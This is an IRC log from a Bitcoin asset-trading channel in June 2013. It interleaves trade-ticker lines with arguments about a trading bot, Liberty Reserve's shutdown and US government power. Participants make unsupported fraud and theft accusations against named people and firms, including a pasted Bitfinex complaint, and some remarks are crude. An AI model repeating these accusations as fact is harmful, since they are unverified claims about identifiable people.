BTC [-] Jun 03 23:25:25 they arent tehre any other time Jun 03 23:25:31 [BTCTC] [PAJKA.BOND] 100 @ 0.102 = 10.2 BTC [-] Jun 03 23:25:34 but there must still be a top Jun 03 23:25:37 and a bottom Jun 03 23:25:39 its always his ask you are hitting. Jun 03 23:25:40 yep Jun 03 23:25:43 for the market price Jun 03 23:25:48 what insanity is this. there's always someone selling wtf. Jun 03 23:25:52 that the bot is willing to play Jun 03 23:25:56 the world doesn't start and end when you move. Jun 03 23:26:07 all you need to do is find that price Jun 03 23:26:11 mircea_popescu: the sell orders arent present until someone places them Jun 03 23:26:15 then you have reached your "reality" Jun 03 23:26:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.024897 = 0.4979 BTC [+] Jun 03 23:26:23 ie someon puts a limit 0.19 the bot instantly puts a 0.189 Jun 03 23:26:28 but the bot was not active earlier Jun 03 23:26:31 this is true for all sell orders , no? Jun 03 23:26:37 it only ensures bids are diverted Jun 03 23:26:40 nothing exists til it exists Jun 03 23:26:49 um Jun 03 23:27:08 i admint, this is preety funny. Jun 03 23:27:12 im sorry, i don't see much more than "how dare other people offer what i'm trying to sell for less than i want for it". Jun 03 23:27:12 admit Jun 03 23:27:21 thats not whats happening Jun 03 23:27:30 if the script is selling for 0.20 Jun 03 23:27:36 and you come in 0.19 Jun 03 23:27:42 it instantly puts 0.189 Jun 03 23:27:52 whats the lowest amount you'll sell your BBET for? Jun 03 23:27:53 ok, and if you come in at 0.15 ? Jun 03 23:27:54 becuase it has such massive supply available the entire premise is to divert bids Jun 03 23:27:54 eyetalian: did you buy too high and now you want out doing a lower valuation than before? Jun 03 23:27:56 eyetalian the way i see it someone wants to do exactly the same thing you want to do but they have a bot and you dont, so you are pissed. Jun 03 23:27:57 i'll adjust the bt for you Jun 03 23:27:58 to the 1 buyer Jun 03 23:28:04 mircea: it will adjust again. Jun 03 23:28:28 kako: the supply the bot has is so high it has to be the owners doing it Jun 03 23:28:35 that is just false Jun 03 23:29:08 well iirc the numbers, about 1mn or so shares sold. Jun 03 23:29:11 during the ipo Jun 03 23:29:12 what price were bbet shares initially offered Jun 03 23:29:14 even if the bot owns ALL the shares taht you dont' it's still fair Jun 03 23:29:21 [MPEX] [S.MPOE] 7416 @ 0.00072541 = 5.3796 BTC [+] Jun 03 23:29:22 [MPEX] [S.MPOE] 1984 @ 0.00072545 = 1.4393 BTC [+] Jun 03 23:29:25 wasnt it 1.5mn? Jun 03 23:29:29 substract from that w/e you're holding and that's the presumptive's bot max supply. Jun 03 23:29:34 something like that. Jun 03 23:29:51 eyetalian 0.00001 BTC each. Jun 03 23:29:53 it's in the contract. Jun 03 23:30:15 but all of them went to you. Jun 03 23:30:25 WTB S.BBET 0.00085011 Jun 03 23:31:11 eyetalian the shares went to ipo investors not us Jun 03 23:31:30 eyetalian, what price do you think IS fair? Jun 03 23:31:58 no they didn't go to me lol. Jun 03 23:32:29 i already told you, it's my bot, and I own all the shares Jun 03 23:32:37 what do you need from me? Jun 03 23:33:55 [MPEX] [S.MPOE] 16600 @ 0.0007251 = 12.0367 BTC [-] Jun 03 23:34:42 [BTCTC] [GSDPT] 60 @ 0.0031 = 0.186 BTC [+] Jun 03 23:35:16 [BTCTC] [S.MPOE-PT] 4 @ 0.000706 = 0.0028 BTC [+] Jun 03 23:36:46 [BTCTC] [S.DICE-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 03 23:37:24 [BTCTC] [S.MPOE-PT] 9 @ 0.000707 = 0.0064 BTC [+] Jun 03 23:37:50 I just got a pm from someone asking for a $68,000 loan Jun 03 23:38:04 sharpie in pooper ? Jun 03 23:38:18 they wanna buy mining equipment Jun 03 23:38:28 and let me hold AM as collateral Jun 03 23:38:32 [BTCTC] [S.DICE-PT] 16 @ 0.00243 = 0.0389 BTC [-] Jun 03 23:38:41 uhhhhh where do I sign! Jun 03 23:39:09 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] Jun 03 23:39:43 I guess I have earned the "will do anything for AM shares" reputation. Jun 03 23:41:29 hehe Jun 03 23:41:33 i suppose in principle it could be said anyone on mpex is running a bot Jun 03 23:41:34 way to go Jun 03 23:41:51 inasmuch as well... most everyone uses the pympex script or some equiv Jun 03 23:41:59 a bot is what, two lines of code away Jun 03 23:41:59 no only you Jun 03 23:42:13 there arent enough participants to have that supply Jun 03 23:42:46 eyetalian are you of the "disregard everything because i know better" school ? Jun 03 23:42:47 i think you just think BBET is worth more than it really is Jun 03 23:42:49 [HAVELOCK] [ASICM] 1 @ 0.024889 BTC [-] Jun 03 23:42:55 maybe you overpaid? Jun 03 23:43:05 [BitFunder] Kenilworth Exploration - Real World Mining Opertunity with Bitcoins Jun 03 23:43:11 ... Jun 03 23:43:11 heh. Jun 03 23:43:14 you will always overpay until the bot has unloaded all of its shares(millions) Jun 03 23:43:40 overpaying is relative Jun 03 23:43:44 thats the whole point. Jun 03 23:43:50 gobble up as many BTC as possible Jun 03 23:43:50 why buy somehting for more than it's worth? Jun 03 23:44:02 here's your solution Jun 03 23:44:11 have DeadTerra move your shares to a PT Jun 03 23:44:15 no bots! Jun 03 23:44:32 they are still linked to mpex Jun 03 23:44:50 ? Jun 03 23:45:01 its an mpex stock Jun 03 23:45:15 yes Jun 03 23:45:18 [HAVELOCK] [ASICM] 20 @ 0.02488 = 0.4976 BTC [-] Jun 03 23:45:20 yes Jun 03 23:45:37 but the problem is the bot Jun 03 23:45:39 not mpex Jun 03 23:45:45 i think thats why nobody wants to list assets on mpex, just too much shady activity in the background imo Jun 03 23:45:49 so move your shares to a PT Jun 03 23:45:56 where there are no bots Jun 03 23:45:59 and sell there Jun 03 23:46:00 i gather the problem are other people, generally. Jun 03 23:46:03 the PT still reflects mpex prices duh. Jun 03 23:46:14 bit you wont get bots undercutting you Jun 03 23:46:18 eyetalian everyone WANTS to. mostly nobody is allowed to. Jun 03 23:46:20 eyetalian: why did you buy in the first place? Jun 03 23:46:21 huge difference there. Jun 03 23:46:22 you can place your asks in peace Jun 03 23:46:39 theoritically... Jun 03 23:46:51 mircea: as far as most are concerned havelock is the exchange dealing in the AAA assets Jun 03 23:46:54 theoretically* Jun 03 23:47:07 oh geez Jun 03 23:47:17 lmao ok. Jun 03 23:47:51 topace_ you put the noob up to it or is he just trollin' ? Jun 03 23:50:04 I'm gonna start a space exploration asset Jun 03 23:50:18 trying to raise 100,000btc Jun 03 23:50:33 looking for anything in particular ? Jun 03 23:50:43 intelligent life Jun 03 23:50:57 badoom! Jun 03 23:52:29 maybe i'll mine in space too Jun 03 23:52:43 like those rich guys Jun 03 23:54:25 [BTCTC] [ASICMINER-PT] 2 @ 2.477 = 4.954 BTC [+] Jun 03 23:56:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.024896 = 0.1245 BTC [-] Jun 03 23:56:06 [BTCTC] [TAT.ASICMINER] 80 @ 0.024897 = 1.9918 BTC [+] Jun 03 23:56:07 [BTCTC] [TAT.ASICMINER] 15 @ 0.024897 = 0.3735 BTC [+] Jun 03 23:57:00 oookay Jun 03 23:57:17 theres actually bids of s.mg nao o.o Jun 03 23:57:42 no listing on coinbr yet Jun 03 23:58:01 i think jurov has to hand approve Jun 03 23:58:18 those aren't real bids, just a bot Jun 03 23:59:02 also bitcoins are fake internet money used by people from tirol. Jun 04 00:01:58 [HAVELOCK] [HIM] 1 @ 2.7705 BTC [+] Jun 04 00:11:41 [HAVELOCK] [ASICM] 1 @ 0.024889 BTC [+] Jun 04 00:12:10 [MPEX] [S.MPOE] 2337 @ 0.00072545 = 1.6954 BTC [+] Jun 04 00:12:10 20:52 < ThickAsThieves> maybe i'll mine in space too Jun 04 00:12:10 [MPEX] [S.MPOE] 9963 @ 0.00072546 = 7.2278 BTC [+] Jun 04 00:12:20 ASICs in space dont need cooling Jun 04 00:12:30 is that true?! Jun 04 00:12:33 and can run off solar power unfettered by atmosphere Jun 04 00:12:43 i have a bitcoin boner Jun 04 00:12:44 i think you're onto something here Jun 04 00:14:18 of course tghey need cooling Jun 04 00:14:28 vacuum is an insulator. asics in space go boom Jun 04 00:14:59 then how do you explain the sun?!!!!! Jun 04 00:15:05 brb panic buying Jun 04 00:15:11 you need to get off the forum Jun 04 00:15:15 it's not agreeing with you :D Jun 04 00:15:16 lmao Jun 04 00:15:35 actually getting ready for a flight, and stupid airline app wont let me check in >_> Jun 04 00:16:32 tell the attendant "it's flight or fight, bitch!" Jun 04 00:16:39 indeed Jun 04 00:16:46 soviets tried nuclear reactors in space Jun 04 00:16:50 didn't work well Jun 04 00:17:00 Scrat is that how you explain the sun ? Jun 04 00:17:04 can't expel heat fast enough Jun 04 00:17:16 "it's flight, fight or ass, bitch!" Jun 04 00:17:22 fission vs fusion derp Jun 04 00:17:37 you didn't say FISSION NUCLEAR REAKTORS Jun 04 00:17:52 nuklear* Jun 04 00:18:09 americans spell it nukular Jun 04 00:18:15 correct Jun 04 00:18:17 at least jack bauer does Jun 04 00:18:29 or nookula, if you are from boston Jun 04 00:19:23 a bunch of satellites are nuclear powered Jun 04 00:19:38 just not reactors Jun 04 00:19:40 jborkl not quite. they're just decay-lighted so to speak Jun 04 00:19:41 yeah Jun 04 00:19:42 RTG's Jun 04 00:19:43 noocleah in maine Jun 04 00:20:02 i don't even want to know canadian Jun 04 00:20:18 NOOKula, eh Jun 04 00:20:34 by the way... do you know about the russian doods who found some soviet era beacons in siberia Jun 04 00:20:41 and stripped them to warm themselves overnight ? Jun 04 00:20:55 that is not healthy. Jun 04 00:21:00 mircea_popescu: then oh shit why do I have 3 testicles Jun 04 00:21:11 more firepower Jun 04 00:21:11 more like oh shit, i shit myself. Jun 04 00:21:34 "hey there, nice tan" Jun 04 00:24:11 [HAVELOCK] [ASICM] 8 @ 0.024889 = 0.1991 BTC [+] Jun 04 00:26:14 LOL Jun 04 00:29:54 [BTCTC] [ASICMINER-PT] 3 @ 2.466 = 7.398 BTC [-] Jun 04 00:33:28 [MPEX] [S.MPOE] 3622 @ 0.0007251 = 2.6263 BTC [-] Jun 04 00:35:36 [HAVELOCK] [ASICM] 18 @ 0.024889 = 0.448 BTC [+] Jun 04 00:38:46 ;;ticker Jun 04 00:38:53 BTCUSD ticker | Best bid: 121.67663, Best ask: 121.67665, Bid-ask spread: 0.00002, Last trade: 121.67665, 24 hour volume: 28543.16748503, 24 hour low: 115.11100, 24 hour high: 122.78483, 24 hour vwap: 118.93708 Jun 04 00:41:51 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] Jun 04 00:46:39 [BTCTC] [ASICMINER-PT] 4 @ 2.478 = 9.912 BTC [+] Jun 04 00:46:45 [BTCTC] [ASICMINER-PT] 6 @ 2.48599 = 14.9159 BTC [+] Jun 04 00:46:58 [BTCTC] [ESECURITYSABTC] 1 @ 0.317489 BTC [+] Jun 04 00:47:41 [BTCTC] [GSDPT] 8 @ 0.0031 = 0.0248 BTC [+] Jun 04 00:47:43 [HAVELOCK] [ASICM] 9 @ 0.024889 = 0.224 BTC [+] Jun 04 00:48:13 [HAVELOCK] [ASICM] 10 @ 0.0248895 = 0.2489 BTC [+] Jun 04 00:50:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.02485 = 0.497 BTC [-] Jun 04 00:55:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.02485 = 0.1243 BTC [-] Jun 04 00:57:40 [BTCTC] [GSDPT] 54 @ 0.0031 = 0.1674 BTC [+] Jun 04 00:57:58 hi all. S.MG? nice! will be added to coinbr in a moment. Jun 04 00:58:18 obv MPEx doesn't have an api for that Jun 04 00:58:37 safer that way. Jun 04 00:59:44 and thestringpuller: i got a consultant, will let you know if slovakia can be added to your list. Jun 04 01:00:27 so far we have romania slovenia and somalia? Jun 04 01:01:40 ha, prague is under water it seems Jun 04 01:02:08 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Jun 04 01:02:12 yea. vienna, bratislava and budapest maybe soon. Jun 04 01:02:47 (no worry, i live 100m above danube level) Jun 04 01:04:26 this global warming... Jun 04 01:04:37 my magnolias think autumn is here. Jun 04 01:04:42 [BTCTC] [BASIC-MINING] 1 @ 0.688989 BTC [-] Jun 04 01:06:40 [BTCTC] [BITVPS] 69 @ 0.000799 = 0.0551 BTC [-] Jun 04 01:09:55 hi guys Jun 04 01:10:05 what is minigame doing? Jun 04 01:10:28 gambling income Jun 04 01:10:57 [BTCTC] [COGNITIVE] 1 @ 0.28999 BTC [+] Jun 04 01:15:12 [BTCTC] [ASICMINER-PT] 2 @ 2.48599 = 4.972 BTC [+] Jun 04 01:15:28 added to coinbr Jun 04 01:17:20 [BTCTC] [BITVPS] 113 @ 0.000726 = 0.082 BTC [-] Jun 04 01:17:23 [BTCTC] [BITVPS] 275 @ 0.000725 = 0.1994 BTC [-] Jun 04 01:21:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02485 BTC [-] Jun 04 01:23:23 [HAVELOCK] [ASICM] 50 @ 0.02488949 = 1.2445 BTC [-] Jun 04 01:26:11 [BTCTC] [GSDPT] 46 @ 0.0031 = 0.1426 BTC [+] Jun 04 01:26:59 speaking of somalia http://www.nationmaster.com/graph/agr_agr_mac_tra_percap-agricultural-machinery-tractors-per-capita Jun 04 01:27:23 jurov what list Jun 04 01:27:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.02479 = 0.124 BTC [-] Jun 04 01:27:41 [BTCTC] [TAT.ASICMINER] 38 @ 0.02466 = 0.9371 BTC [-] Jun 04 01:27:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.02465 = 0.074 BTC [-] Jun 04 01:27:45 [MPEX] [S.MPOE] 4321 @ 0.00072223 = 3.1208 BTC [-] Jun 04 01:27:47 [MPEX] [S.MPOE] 6829 @ 0.00072215 = 4.9316 BTC [-] Jun 04 01:27:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.02451 = 0.049 BTC [-] Jun 04 01:28:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.024351 = 0.1705 BTC [-] Jun 04 01:29:32 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] Jun 04 01:29:42 [BTCTC] [PAJKA.BOND] 1 @ 0.109498 BTC [+] Jun 04 01:35:01 http://trilema.com/2013/since-what-you-do-all-day-is-jack-off-anyway/ Jun 04 01:35:08 if anyone here watches porn, there's 1 btc to be made. Jun 04 01:35:11 [BTCTC] [TAT.ASICMINER] 18 @ 0.0247 = 0.4446 BTC [+] Jun 04 01:35:12 witha little luck. Jun 04 01:45:19 [MPEX] [S.MPOE] 4321 @ 0.00072418 = 3.1292 BTC [+] Jun 04 01:45:21 [MPEX] [S.MPOE] 14700 @ 0.00072419 = 10.6456 BTC [+] Jun 04 01:45:30 [MPEX] [S.MPOE] 5878 @ 0.00072508 = 4.262 BTC [+] Jun 04 01:45:31 [MPEX] [S.MPOE] 701 @ 0.00072546 = 0.5085 BTC [+] Jun 04 01:47:07 I love to watch porn Jun 04 01:58:21 kakobrekla, deadweasel was asking mp for list of bitcoin-safe countries Jun 04 01:58:37 presumably to move to Jun 04 01:58:38 that was TAT Jun 04 01:58:42 or someone Jun 04 01:58:57 oh sry, no it was thestringpuller Jun 04 01:59:08 although I'd read it. Jun 04 01:59:34 in logs some 6 hrs ago Jun 04 02:01:10 oh and eyetalian, i do have a bot, too. but it's not on bbet and it's much more polite. Jun 04 02:01:43 what do you mean bitcoin safe countries? Jun 04 02:02:02 in the sense US is bitcoin-unsafe Jun 04 02:02:17 [BTCTC] [ASICMINER-PT] 1 @ 2.485999 BTC [-] Jun 04 02:02:24 countries which are ruled by laws and respect for individual rights Jun 04 02:02:35 rather than corporate interest and bureaucratic autarchy Jun 04 02:02:40 [HAVELOCK] [ASICM] 400 @ 0.02488949 = 9.9558 BTC [-] Jun 04 02:02:42 i thought US was only unsafe for exchangers Jun 04 02:03:15 well, LR was not an exchanger Jun 04 02:03:38 for example. and it was not even located in US. Jun 04 02:03:53 LR was stealing funds though from accounts Jun 04 02:04:07 their were more LR balances then dollars backing them Jun 04 02:04:18 oh, so US sacked them because of *that*? Jun 04 02:04:30 well they sacked them for that money laundering bs Jun 04 02:04:35 but im glad LR went down they stole millions Jun 04 02:05:00 sauce ? Jun 04 02:05:32 LR wasn't *just* a paypal for crooks Jun 04 02:05:41 they were actively freezing high dollar accounts Jun 04 02:05:44 for years Jun 04 02:06:22 In May 2013, Liberty Reserve was shut down by United States federal prosecutors under the Patriot Act Jun 04 02:06:28 funny what that thing is used for. Jun 04 02:06:40 LR had warnings since 2011. Jun 04 02:06:52 and the owners were thieves Jun 04 02:07:41 if US based exchanges comply with US rules theres nothing the government will do to them Jun 04 02:08:09 so, prolly they stole some HSBC stash and fell into disgrace for US power structures, you say? Jun 04 02:08:16 nice conspiration Jun 04 02:08:34 the owners had a history with US law enforcement Jun 04 02:08:36 lolwut Jun 04 02:08:41 you play with fire you get burnt imo Jun 04 02:09:06 if you deal in US dollars you subject yourself to US government Jun 04 02:09:15 simple as that. Jun 04 02:09:20 dont like their rules dont use their money Jun 04 02:10:27 [BTCTC] [ASICMINER-PT] 1 @ 2.486 BTC [+] Jun 04 02:11:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.0247 = 0.1976 BTC [+] Jun 04 02:11:15 this is not how it works. Jun 04 02:11:25 sure it does Jun 04 02:11:42 [BTCTC] [PAJKA.BOND] 2 @ 0.0991 = 0.1982 BTC [-] Jun 04 02:11:44 [BTCTC] [PAJKA.BOND] 20 @ 0.099 = 1.98 BTC [-] Jun 04 02:11:47 [BTCTC] [PAJKA.BOND] 10 @ 0.099 = 0.99 BTC [-] Jun 04 02:11:56 if you stay away from US government related stuff they stay away from you Jun 04 02:12:29 ... Jun 04 02:12:48 da fuck is this, bullying 101 ? Jun 04 02:12:48 mtgox same thing. they did not have proper accounts setup Jun 04 02:13:03 no its the real world Jun 04 02:13:12 US gov is like an organized crime gang Jun 04 02:13:26 if you stay away from them they are harmless Jun 04 02:14:53 tell that to gitmo detainees Jun 04 02:15:09 lol you believe they are just randoms?| Jun 04 02:15:48 how did the discussion become a matter of what he believes ? Jun 04 02:15:57 do you have complete and indisputable proof they aren't ? Jun 04 02:16:00 the US is only 5% of the worlds population, there are plenty of alternatives Jun 04 02:16:16 if you stay away from US gov they stay away from you simple as that Jun 04 02:16:28 suppose they stay away from me, i stay away friom them, simple as that. Jun 04 02:16:36 in any game of bullying i shall be doing the beating. Jun 04 02:16:38 it doesn't matter if they are randoms. they have a right to trial, usg denies it Jun 04 02:16:39 sure Jun 04 02:17:28 And then I told him, "you can't put that there!" and then just walked away. It was hillarious. Jun 04 02:17:52 huh ? Jun 04 02:17:56 furuknap, wrong tab? Jun 04 02:18:10 if you stay away from US gov they stay away from you simple as that Jun 04 02:18:12 lol Jun 04 02:18:13 the US government is like a chained up dog, harmless as long as you stay away. Jun 04 02:18:16 Just messing with you guys... Jun 04 02:18:18 unless you're in need of some freedom Jun 04 02:18:30 I was offline and typing to myself, not noticing I was gone... Jun 04 02:18:42 orkaa ? Jun 04 02:18:49 yes, chained up dog with drone remote Jun 04 02:18:59 dont give them a reason to target you Jun 04 02:19:08 lol, lol Jun 04 02:19:14 anyway, i think i've had enough of this nonsense. bye eyeguy. Jun 04 02:19:17 eyetalian!*@* added to ignore list. Jun 04 02:19:20 how do i know what is the reason? Jun 04 02:19:43 i may be money laundering in usg eyes right now Jun 04 02:20:20 eyetalian, so girls shouldn't wear short skirts 'cause they give guys a reason to rape them Jun 04 02:20:26 that's what you're saying Jun 04 02:20:59 eyetalian: do your own research about gitmo. there were journalists, Uk citizens, you name it. Jun 04 02:21:50 http://www.thetruthseeker.co.uk/wordpress/wp-content/uploads/2012/07/us_military_bases_surrounding_iran_jpg-2.jpg Jun 04 02:21:59 for that matter, they kidnapped the ex head of the imf under manufactured charges Jun 04 02:22:02 this picture says everything abou eyetalian's flawless logic Jun 04 02:22:03 which they knew were manufactured. Jun 04 02:22:09 they tried the same with the assange guy Jun 04 02:22:11 the list is endless. Jun 04 02:23:00 basically everyone there. Jun 04 02:23:05 no one had a trial Jun 04 02:23:10 if anyone here watches porn, there's 1 btc to be made. >"If anyone here watches porn" he says... *tsk* Jun 04 02:24:12 lol Jun 04 02:24:42 eyetalian, where are you from? Jun 04 02:24:53 http://www.youtube.com/watch?v=LTJvdGcb7Fs Jun 04 02:24:58 oh i thought fox news Jun 04 02:25:09 *he's from fox news Jun 04 02:25:18 yeah me too Jun 04 02:25:50 actually fox news doesn't, too. afaik Jun 04 02:26:11 ok jurov cool Jun 04 02:26:15 i can do somalia 101 Jun 04 02:26:18 for 10 btc Jun 04 02:30:35 oh eyetalian: you do know they said practically whole internet is under US jurisdiction? Jun 04 02:30:45 at least .com domains are Jun 04 02:31:05 now do tell me how "best to avoid it" Jun 04 02:31:35 lol. they can extend to other TLDs any day Jun 04 02:32:03 how not? ICANN is in US. Jun 04 02:32:45 lol this gets better Jun 04 02:33:14 so what was the procedure to discover WMDs in iraq? Jun 04 02:33:21 do explain me pls Jun 04 02:35:38 [MPEX] [S.MPOE] 8136 @ 0.00072546 = 5.9023 BTC [+] Jun 04 02:35:40 [MPEX] [S.MPOE] 6264 @ 0.00072645 = 4.5505 BTC [+] Jun 04 02:38:04 http://also.kottke.org/misc/images/nick-ut-vietnam.jpg Jun 04 02:38:19 these kids had at least 10 seconds warning.. Jun 04 02:38:49 yeah but it's kinda the same thing Jun 04 02:39:00 if you do some nasty stuff and then call it 'war' Jun 04 02:39:04 nice child porn. Jun 04 02:39:05 it doesn't change anything Jun 04 02:39:48 .. as long as you don't try to exchange bitcoins. ic. Jun 04 02:40:32 if they have such nice rigid rules, then why so high incarceration? Jun 04 02:40:42 [HAVELOCK] [HIM] 1 @ 2.8 BTC [+] Jun 04 02:42:17 btw, what's the primary topic we're arguing about? Jun 04 02:45:50 hence, bitcoin unfriendly Jun 04 02:47:52 eyetalian, but that's like saying that the US health system is very friendly …. it's just that most people have a money problem Jun 04 02:47:56 actually there's coinlab and others, and there *are* serious problems Jun 04 02:48:27 kakobrekla: Somalia is NOT the same as Serbia, just sayin. Jun 04 02:48:44 now you are learning. Jun 04 02:48:47 =D Jun 04 02:49:25 so which one had the deal with silicon valley bank? Jun 04 02:49:26 [HAVELOCK] [ASICM] 12 @ 0.02488949 = 0.2987 BTC [-] Jun 04 02:49:27 [HAVELOCK] [ASICM] 18 @ 0.0248895 = 0.448 BTC [+] Jun 04 02:49:50 [HAVELOCK] [SDICE] 2 @ 0.233 = 0.466 BTC [+] Jun 04 02:49:51 [HAVELOCK] [SDICE] 47 @ 0.2331 = 10.9557 BTC [+] Jun 04 02:49:53 [HAVELOCK] [SDICE] 5 @ 0.2335 = 1.1675 BTC [+] Jun 04 02:49:54 [HAVELOCK] [SDICE] 5 @ 0.2335 = 1.1675 BTC [+] Jun 04 02:49:55 if not even a bank dares to go in, what friendiless is that? Jun 04 02:49:55 [HAVELOCK] [SDICE] 10 @ 0.2335 = 2.335 BTC [+] Jun 04 02:49:56 [HAVELOCK] [SDICE] 5 @ 0.2336 = 1.168 BTC [+] Jun 04 02:49:57 [HAVELOCK] [SDICE] 23 @ 0.2337 = 5.3751 BTC [+] Jun 04 02:50:03 *frinedliness Jun 04 02:50:17 even somalia too cool for slovenia now ?! Jun 04 02:50:38 no one knows how to comply properly Jun 04 02:50:59 btw jurov, its not 'bitcoin friendly' its 'too stupid to acknowledge' Jun 04 02:52:52 we are not discussing that, only you insist on painting me as wanting to operate without licenses Jun 04 02:53:17 we are discussing *how* easy is to have all these licenses in order Jun 04 02:53:19 the US isnt anything friendly Jun 04 02:53:33 uneasy = not friendly country. that's all Jun 04 02:53:54 i know. it's late here, good night. Jun 04 02:56:24 hence, not friendly. Jun 04 02:56:29 http://tech.fortune.cnn.com/2011/06/17/the-clock-is-ticking-on-bitcoin/ Jun 04 02:56:36 let us revisit the good old days. Jun 04 02:57:02 [MPEX] [S.MPOE] 3633 @ 0.00072477 = 2.6331 BTC [-] Jun 04 03:00:24 [MPEX] [S.MPOE] 14400 @ 0.00072659 = 10.4629 BTC [+] Jun 04 03:00:26 [MPEX] [S.MPOE] 2850 @ 0.00072683 = 2.0715 BTC [+] Jun 04 03:00:30 [HAVELOCK] [ASICM] 2 @ 0.0248895 = 0.0498 BTC [+] Jun 04 03:00:39 [MPEX] [S.MPOE] 8450 @ 0.00072844 = 6.1553 BTC [+] Jun 04 03:00:43 I remember reading that Jun 04 03:01:00 who knew what this would turn into Jun 04 03:03:02 indeed. Jun 04 03:03:13 see you in june 2015 Jun 04 03:05:15 heh i shall have to remember this moment actually..i've sobered up a bit. Jun 04 03:16:19 [HAVELOCK] [ASICM] 5 @ 0.02489 = 0.1245 BTC [+] Jun 04 03:17:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.02479 = 0.2479 BTC [+] Jun 04 03:18:13 [HAVELOCK] [ASICM] 198 @ 0.0248895 = 4.9281 BTC [-] Jun 04 03:32:44 [HAVELOCK] [ASICM] 21 @ 0.0248895 = 0.5227 BTC [-] Jun 04 03:37:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.02479 = 0.0992 BTC [+] Jun 04 03:39:25 https://bitcointalk.org/index.php?topic=224745.0 Jun 04 03:39:31 ok that's juicy. Jun 04 03:49:33 omg Jun 04 03:49:39 tpb now accepts ltc donations Jun 04 03:49:53 whores. Jun 04 03:51:06 ill send them a few new vagcoins. Jun 04 03:53:15 lol Jun 04 03:53:20 perobably nobody was paying in btc Jun 04 03:56:54 [MPEX] [S.MPOE] 7150 @ 0.00072844 = 5.2083 BTC [+] Jun 04 03:56:55 [MPEX] [S.MPOE] 5200 @ 0.00072853 = 3.7884 BTC [+] Jun 04 04:05:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.02479 = 0.3719 BTC [+] Jun 04 04:10:48 3. Besides that is required an audit for the entire bitfinex platform, Jun 04 04:10:48 the platform tempered/adjusted twice, first with mister Tang and was Jun 04 04:10:48 credited from him 150.000 USD, that he didn't deposit in his account, Jun 04 04:10:48 the second time when mister Devasini was credited one million dollars, Jun 04 04:10:48 money that he didn't have deposited in his account. Because of this I Jun 04 04:10:49 cannot be sure if the current losses are real or not. Jun 04 04:10:51 O_O Jun 04 04:13:03 i tell you it's good. Jun 04 04:15:17 What, so what's happening over here? Jun 04 04:15:35 scammer tag truck Jun 04 04:15:52 oh, Bitfinex I see. Jun 04 04:16:30 I think I have 25$ in there. They can have it. Jun 04 04:18:32 Wow, 1 hr since a block was found. Jun 04 04:19:06 ;;tslb Jun 04 04:19:10 Time since last block: 58 minutes and 53 seconds Jun 04 04:19:13 [BTCTC] [BITVPS] 1 @ 0.000799 BTC [+] Jun 04 04:19:40 dang Jun 04 04:19:42 since the spring fork i can't see 1 hr blocks w/o thinking omfg don't tell me, again ?! Jun 04 04:20:45 [BTCTC] [RSM] 1 @ 0.008568 BTC [+] Jun 04 04:21:47 Funny how every time I send or receive BTC, confirmation time skyrockets Jun 04 04:21:54 blockchain.info keeps crying wolf tho Jun 04 04:22:09 so now i dont know what to think Jun 04 04:22:34 ThickAsThieves you mean ? Jun 04 04:22:40 [HAVELOCK] [ASICM] 600 @ 0.0248895 = 14.9337 BTC [-] Jun 04 04:23:02 Neil just because you're paranoid dones't mean the network isn't out to get you. Jun 04 04:23:07 they have been hanging behind several times lately Jun 04 04:23:28 you need to verify with another source Jun 04 04:24:32 ;;tslb Jun 04 04:24:37 Time since last block: 1 minute and 46 seconds Jun 04 04:24:59 yup i see it. Jun 04 04:27:09 [HAVELOCK] [SDICE] 5 @ 0.2337 = 1.1685 BTC [+] Jun 04 04:36:56 [BTCTC] [COGNITIVE] 5 @ 0.28999 = 1.45 BTC [+] Jun 04 04:41:46 ;;tslb Jun 04 04:41:49 Time since last block: 1 minute and 29 seconds Jun 04 04:42:29 ;;bc,stats Jun 04 04:42:33 Current Blocks: 239583 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 320 blocks | Next Difficulty In About: 1 day, 13 hours, 49 minutes, and 57 seconds | Next Difficulty Estimate: 15263342.1331 | Estimated Percent Change: 25.58895 Jun 04 04:51:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.02478 = 0.0496 BTC [-] Jun 04 04:55:16 [BTCTC] [TAT.ASICMINER] 26 @ 0.02478 = 0.6443 BTC [-] Jun 04 04:55:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.02478 = 0.0991 BTC [-] Jun 04 04:55:54 [BTCTC] [ASICMINER-PT] 2 @ 2.486 = 4.972 BTC [+] Jun 04 04:55:55 [BTCTC] [ASICMINER-PT] 1 @ 2.49799 BTC [+] Jun 04 04:56:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02479 BTC [+] Jun 04 05:05:39 whats the division for TAT? 100? Jun 04 05:05:50 Yeah Jun 04 05:06:02 so ~2.48 would be a good AM value? Jun 04 05:06:06 er, valuation Jun 04 05:07:49 [BTCTC] [TAT.ASICMINER] 23 @ 0.02479 = 0.5702 BTC [+] Jun 04 05:10:19 [HAVELOCK] [ASICM] 10 @ 0.0248895 = 0.2489 BTC [-] Jun 04 05:10:37 [HAVELOCK] [SDICE] 1 @ 0.2345 BTC [+] Jun 04 05:12:00 ;;seen mod6 Jun 04 05:12:00 mod6 was last seen in #bitcoin-assets 47 minutes and 27 seconds ago: ;;tslb Jun 04 05:12:04 mod6 works too much Jun 04 05:12:14 needs more bots Jun 04 05:13:44 [HAVELOCK] [VTX] 1 @ 0.4366 BTC [+] Jun 04 05:14:52 value != price. Jun 04 05:16:07 So I had a dream about a movie or a story or something. I dunno, but it starred Leo or Matt Damon or some other white fucker who likes to act "deep". ANYHOW lemme know if this sounds familiar: Jun 04 05:16:11 